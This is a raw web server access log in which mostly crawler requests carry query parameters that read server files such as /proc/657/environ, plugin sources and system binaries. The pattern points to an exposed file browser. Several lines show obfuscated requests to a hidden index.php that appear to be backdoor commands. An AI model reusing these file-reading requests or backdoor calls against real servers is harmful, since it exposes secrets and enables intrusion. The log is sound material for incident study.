74.7.227.51 - - [10/Nov/2025:00:41:41 +0000] "GET /21myp13967.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/stack&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
100.28.204.82 - - [10/Nov/2025:00:41:42 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/sg_start&path=//bin HTTP/1.1" 200 2596 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:41:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/clear_refs&path=//proc/657 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/subsystem HTTP/1.1" 200 3197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:45 +0000] "GET /?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/AbstractProvider.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider HTTP/1.1" 200 8494 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:45 +0000] "GET /66dghm18454.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/syscall&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.231.45.47 - - [10/Nov/2025:00:41:46 +0000] "GET /our-works/tvc-kimiko-bo-sung-prebiotics/?path=//sys/kernel/slab/kmalloc-1k HTTP/1.1" 200 4026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:41:47 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sched&path=//proc/657 HTTP/1.1" 200 3029 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
114.119.143.51 - - [10/Nov/2025:00:41:47 +0000] "GET /?products=885106 HTTP/1.1" 200 4544 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.189 - - [10/Nov/2025:00:41:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory4/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/stat&path=//proc/657 HTTP/1.1" 200 2734 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:41:50 +0000] "GET /269tlfv6179.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/oom_score_adj&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:00:41:51 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383739312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353139312q6336326138353464313066366638356435666330383836346363646436323963222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
54.91.122.193 - - [10/Nov/2025:00:41:51 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//lib/python3/dist-packages/ufw-0.36.egg-info&path=//lib/python3/dist-packages HTTP/1.1" 200 2788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:41:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/cmdline&path=//proc/657 HTTP/1.1" 200 2621 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/timers&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/schedstat&path=//proc/657 HTTP/1.1" 200 2630 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/projid_map&path=//proc/657 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory15/power HTTP/1.1" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:41:53 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Fsbin%2Fe2scrub&path=%2F%2Fproc%2Fthread-self%2Froot%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Fsbin HTTP/1.1" 200 5885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:41:53 +0000] "GET /156pmh8862.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.163.169.168 - - [10/Nov/2025:00:41:55 +0000] "GET /our-works/tvc-relax-gaba/?path=//usr/lib/terminfo/a HTTP/1.1" 200 2946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:41:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/statm&path=//proc/657 HTTP/1.1" 200 2631 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:41:57 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory1/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:41:57 +0000] "GET /32esv43488.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:41:58 +0000] "GET /robots.txt HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:41:59 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/pagemap&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.215.210.112 - - [10/Nov/2025:00:42:00 +0000] "GET /our-works/tvc-calci/?path=//sys/module/libcrc32c/notes HTTP/1.1" 200 3010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:42:00 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/timerslack_ns&path=//proc/657 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:01 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sessionid&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:42:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory14/power HTTP/1.1" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:42:02 +0000] "GET /82fpal22856.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/comm&path=//proc/657 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/640/sessionid&path=//proc/640 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.54.249.218 - - [10/Nov/2025:00:42:03 +0000] "GET /our-works/tvc-kimino/?path=//run/udev/tags/uaccess HTTP/1.1" 200 2991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:42:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sched&path=//proc/657 HTTP/1.1" 200 3029 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:42:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory7/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/status&path=//proc/657 HTTP/1.1" 200 3084 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/uid_map&path=//proc/657 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:42:08 +0000] "GET /284gwnm5566.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.29.160.53 - - [10/Nov/2025:00:42:08 +0000] "GET /our-works/tvc-calci/?fileloc=//lib/python3/dist-packages/_version.py&path=//lib/python3/dist-packages HTTP/1.1" 200 2641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:42:09 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/patch_state&path=//proc/657 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:10 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/setgroups&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
40.77.167.16 - - [10/Nov/2025:00:42:10 +0000] "GET /?products=1827701072 HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:42:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory8/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:42:12 +0000] "GET /179wtsh4351.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.210.223.61 - - [10/Nov/2025:00:42:12 +0000] "GET /our-works/tvc-calci/?path=//sys/module/libcrc32c/notes HTTP/1.1" 200 3010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:42:13 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Fuapi%2Frdma%2Frvt-abi.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Fuapi%2Frdma HTTP/1.1" 200 3443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:00:42:13 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/coredump_filter&path=//proc/657 HTTP/1.1" 200 2618 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:00:42:14 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383831342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353231342q3232333938303639383932646436653739666263343534336536313563373734222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:00:42:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/arch_status&path=//proc/659 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/syscall&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:42:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory12/power HTTP/1.1" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/schedstat&path=//proc/657 HTTP/1.1" 200 2630 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.157.84.74 - - [10/Nov/2025:00:42:15 +0000] "GET /our-works/tvc-lapatie-2/?path=//usr/share/doc/libcgi-pm-perl HTTP/1.1" 200 3177 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:00:42:15 +0000] "GET / HTTP/1.1" 200 4543 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:42:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/640/setgroups&path=//proc/640 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:42:16 +0000] "GET /44qnvi47374.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:42:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory2/node0 HTTP/1.1" 200 3946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.231.45.47 - - [10/Nov/2025:00:42:19 +0000] "GET /our-works/tvc-jokky/?fileloc=//proc/sys/kernel/modules_disabled&path=//proc/sys/kernel HTTP/1.1" 200 2623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:42:19 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/autogroup&path=//proc/659 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:42:20 +0000] "GET /54jba44946.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:20 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/personality&path=//proc/657 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:42:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory7/node0/memory10 HTTP/1.1" 200 3400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:23 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:25 +0000] "GET /?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3615 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:42:25 +0000] "GET /27jlh27503.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.81.253.213 - - [10/Nov/2025:00:42:26 +0000] "GET /our-works/corporate/marina-plaza/?path=//usr/lib/man-db HTTP/1.1" 200 3261 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:42:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/cpuset&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:42:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory4/power HTTP/1.1" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/auxv&path=//proc/659 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/timers&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sessionid&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
100.28.118.16 - - [10/Nov/2025:00:42:30 +0000] "GET /our-works/phim-viral-ila/?fileloc=//proc/driver/rtc&path=//proc/driver HTTP/1.1" 200 2769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:42:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/projid_map&path=//proc/657 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/auxv&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:42:32 +0000] "GET /126mtc4684.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.28.204.82 - - [10/Nov/2025:00:42:33 +0000] "GET /our-works/tvc-caltex-havoline/?path=//lib/systemd/system/runlevel5.target.wants HTTP/1.1" 200 2686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:42:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory4/power HTTP/1.1" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:34 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps_rollup&path=//proc/657 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:35 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/environ&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
18.205.127.11 - - [10/Nov/2025:00:42:37 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/php-cgi7.4&path=//bin HTTP/1.1" 200 2598 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:42:37 +0000] "GET /166twxf1146.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/cgroup&path=//proc/659 HTTP/1.1" 200 2738 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:42:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory2/power HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/timerslack_ns&path=//proc/657 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:42:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/cgroup&path=//proc/657 HTTP/1.1" 200 2733 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.200.142.199 - - [10/Nov/2025:00:42:40 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//usr/share/libc-bin HTTP/1.1" 200 2950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:00:42:41 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383834312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353234312q3137313535623364616138393662353131336663663662633064616266623334222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
